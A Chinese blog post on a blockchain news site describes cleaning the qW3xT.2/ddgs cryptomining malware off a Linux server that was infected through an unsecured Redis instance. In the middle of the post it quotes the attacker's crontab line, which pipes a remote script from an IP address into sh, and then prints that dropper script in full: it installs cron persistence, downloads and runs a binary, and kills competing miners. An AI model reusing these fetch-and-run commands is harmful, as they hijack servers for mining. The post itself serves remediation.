找回密码
 立即注册
  • QQ空间
  • 回复
  • 收藏

Linux 下qW3xT.2,解决挖矿病毒

币看世界| 2018-10-12 00:16 阅读 1115 评论 1

早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。

Linux 下qW3xT.2,解决挖矿病毒


在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。

解决办法:

1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis

2、进入/tmp文件夹下。发现qW3xT.2文件,删除。之后kill掉qW3xT.2该进程,但是一段时间之后,发现该行程又重新启动。

肯定是有守护进程,观察top命令下的进程,发现一个可疑的进行

Linux 下qW3xT.2,解决挖矿病毒


3、在/tmp文件夹下发现该进程的文件 ls /tmp

发现qW3xT.2文件又重新生成了。这时,首先删除qW3xT.2文件和ddgs.3013文件,然后使用top查询qW3xT.2和ddgs.3013的pid,直接kill掉。

4、一段时间之后,删除的文件重新生成,dds和挖矿的进程又重新执行。此时怀疑是否有计划任务,此时查看计划任务的列表
[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -l*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -r //删除计划任务

curl 的这几个 optional 介绍,我也是百度的

-f - fail在HTTP错误(H)上静默失败(根本没有输出)

-s -silent静音模式。 不要输出任何东西

–socks4 HOST [:PORT]给定主机+端口上的SOCKS4代理

–socks4a HOST [:PORT]给定主机+端口上的SOCKS4a代理

–socks5 HOST [:PORT]给定主机+端口上的SOCKS5代理

–socks5-hostname HOST [:PORT] SOCKS5代理,将主机名传递给代理

–socks5-gssapi-service名称为gssapi的SOCKS5代理服务名称

–socks5-gssapi-nec与NEC SOCKS5服务器的兼容性

-S –show-error显示错误。 使用-s时,make curl会在出现错误时显示错误

-L –location遵循重定向(H)

–location-trusted like –location并将auth发送给其他主机(H)

此时计划任务已经删除。详细信息查看https://juejin.im/post/5b62b975f265da0f9628a820。

计划任务删除完成之后,这个13又开始运行。太顽固了。

于是我又看计划任务的内容,是否是有东西没有删除干净。
[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.shexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "" > /var/spool/cron/rootecho "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/rootmkdir -p /var/spool/cron/crontabsecho "" > /var/spool/cron/crontabs/rootecho "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013if [ ! -f "/tmp/ddgs.3013" ]; then curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013fichmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs killps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs killps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs killps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs killps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs killps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill发现计划任务在服务器中创建了几个文件,/var/spool/cron/crontabs/root/var/spool/cron/root内容是*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(与计划任务相同)将计划任务中创建的文件删除。

最终,这个挖矿病毒终于删除完成

本文仅代表作者个人观点,不代表巨推链平台发声,对文章观点有疑义请先联系作者本人进行修改,若内容非法请联系平台管理员,邮箱cxb5918@163.com。更多区块链资讯,请到百万区块链发烧友聚集平台巨推链www.jutuilian.com学习区块链技术请到巨推学院www.jutuiedu.com
  • 卜静 2018-10-12 00:23
    我也遇到过,跟你的情况类似[捂脸]
文章点评
2019-02-19 06:52
+场景 区块链初创公司Blockstream宣布推出了比特币侧链
Blockstream的首席战略官Samson Mow 今天宣布,区块链初创公司推出了Liquid Network, <详情>
2019-02-19 06:26
应用 声讯晚班车:NASA欲用区块链技术改进广播式自动相关监视系统
摘要: 最高人民法院:积极推进区块链等科技创新成果同审判执行工作深度融合;世界自 <详情>
2019-02-19 05:52
数字币 分析师:如果比特币跌破3000美元,市场将迎来“核武级寒冬”
免责声明:本文不构成任何投资建议。小编:记得关注哦!文章来源:金投网2019年新年的 <详情>
2019-02-19 03:25
数字币 姚前:区块链生态系统的委托代理问题及其治理
根据不同的初始构建方式,可以将初始UTXO分别界定为支付工具、加密权益和数字资产。不 <详情>
2019-02-19 02:37
应用 区块链明星项目:临界Hashgard公有链测试网络全面升级
在2018年12月28日,临界 (Hashgard) 新一代数字金融公有链测试网络正式上线经过20多天 <详情>
2019-02-19 01:45
数字币 《8问》方图蔡良滨:金融行业99.9%都是中介机构
蔡良滨,方图(Fortuna)区块链CEO,耶鲁大学计算机科学硕士。小别的导语“平庸不在于 <详情>
2019-02-19 00:28
+场景 区块链吴忌寒、徐明星等进入胡润百富榜,这是踩着韭菜们上去的么
《2018年胡润百富榜》正式出炉,值得关注的是,在胡润百富榜20周年之际,区块链行业人 <详情>
2019-02-18 23:38
应用 蚂蚁金服与区块链的不解之缘
马云曾说:“我特别骄傲的是,我们的技术人员为区块链找到正确的发展轨道。区块链技术 <详情>
2019-02-18 21:28
+场景 中国人民银行,人民网与迅雷,等快讯五则
【狄刚:金融行业区块链应用面临四大挑战,区块链的发展还在路上】 在2018可信区块链 <详情>
2019-02-18 21:07
数字币 富人越富,穷人越穷,我为什么反对PoS
据摩根士丹利年初报告,2017年比特币挖消耗的电力与中东国家卡塔尔年耗电相当,预计20 <详情>
2019-02-18 20:40
数字币 区块链日报:西班牙BBVA银行关闭中国人账户助推比特币上涨
区块链日报:西班牙BBVA银行关闭中国人账户助推比特币上涨Morgan Creek创始人:西班牙 <详情>
2019-02-18 19:17
数字币 故事:他冲到银行,发现游戏币真的能换钱,他就决定买个名牌手机
  伸手拦了一辆出租车,林梓晨坐在后面,火急火燎的对着司机说道:“我要去最近的银 <详情>
2019-02-18 18:04
+场景 区块链周度大数据洞察
(作者:火币研究院,内容来自链得得内容开放平台“得得号”;本文仅代表作者观点,不 <详情>
2019-02-18 17:43
数字币 全球四大会计事务所区块链战略布局全解
普华永道(PWC)、德勤(DTT)、毕马威(KPMG)、安永(EY),四家全球知名的会计师事 <详情>
2019-02-18 17:30
数字币 以太坊的窘境与突围
以太坊的窘境与突围若以太坊能够脱离PoW的束缚完成向PoS的过渡,以太坊2.0的构架便真 <详情>
2019-02-18 17:26
应用 革微信的命,要靠“聊天即挖矿”?
广告诱惑我们追求名车服饰,从事自己憎恨的工作,为的就是买堆根本没用的狗屁东西。— <详情>
2019-02-18 16:48
数字币 苹果联合创始人:在2万美元时卖了所有比特币,不是为了钱才买的
免责声明:本文不构成任何投资建议。小编:记得关注哦!文章来源:巴比特“当比特币飞 <详情>
2019-02-18 15:22
数字币 加密货币钱包 imToken 正式宣布开源,目前用户已超过700万
2018 年10 月 24 日,imToken 正式将 imToken 2.0 的核心代码公布到 Github ,实现代 <详情>
2019-02-18 15:05
+场景 阿里巴巴的区块链平台?区块链服务的现在和未来深度解析
区块链这个名词成为我们现今的一个热搜词之一,它的出现让很多人看到新的商机和机遇, <详情>
2019-02-18 14:26
数字币 摩根大通再评比特币:这类资产的价值仅存在于经济萧条地区
摩根大通(JP Morgan)依然在继续diss比特币和加密货币,其表示加密货币的价值尚未得 <详情>